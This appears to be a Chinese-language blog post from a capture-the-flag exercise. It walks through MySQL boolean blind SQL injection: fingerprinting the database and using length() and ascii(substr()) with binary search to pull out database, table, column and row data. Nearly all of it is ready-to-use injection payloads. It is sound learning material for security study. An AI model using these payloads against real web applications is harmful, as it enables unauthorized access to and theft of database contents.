I3eg1nner's blog

MySQL 盲注

判断数据库类型

//判断是否是 Mysql数据库

id=1' and exists(select*from information_schema.tables) --+

//判断是否是 access数据库

id=1' and exists(select*from msysobjects) --+

//判断是否是 Sqlserver数据库

?id=1' and exists(select*from sysobjects) --+

判断数据库名

1：判断当前数据库的长度，利用二分法
?id=1' and length(database())>5 --+ //正常显示

?id=1' and length(database())>10 --+ //不显示任何数据

?id=1' and length(database())>7 --+ //正常显示

?id=1' and length(database())>8 --+ //不显示任何数据

2：判断当前数据库的字符，和上面的方法一样
//判断数据库的第一个字符
?id=1' and ascii(substr(database(),1,1))>100 --+

//判断数据库的第二个字符
?id=1' and ascii(substr(database(),2,1))>100 --+

判断当前数据库中的表

1：判断当前数据库中表的个数
// 判断当前数据库中的表的个数是否大于5，用二分法依次判断，最后得知当前数据库表的个数为7
?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())>5 #

2：判断每个表的长度
//判断第一个表的长度，用二分法依次判断，最后可知当前数据库中第一个表的长度为6
id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>1--+

3：判断每个表的每个字符的ascii值
//判断第一个表的第一个字符的ascii值
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100 #
.........

判断表中的字段

1：判断表中字段的个数
//判断flag表中字段个数是否大于5，这里的users表是通过上面的语句爆出来的
?id=1' and (select count(column_name) from information_schema.columns where table_name='flag')>5 #

2：判断字段的长度
//判断第一个字段的长度
?id=1' and length((select column_name from information_schema.columns where table_name='flag' limit 0,1))>5

3：判断字段的ascii值
//判断第一个字段的第一个字符的长度
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1,1))>100

...........

判断字段中的数据

1: 判断数据的长度
// 判断id字段的第一个数据的长度
?id=1' and length((select id from flag limit 0,1))>5

2：判断数据的ascii值
// 判断id字段的第一个数据的第一个字符的ascii值
?id=1' and ascii(substr((select id from users limit 0,1),1,1))>100

...........//同理判断flag字段

忙活了半天发现得到的flag不对，这关的flag位于env_list表里……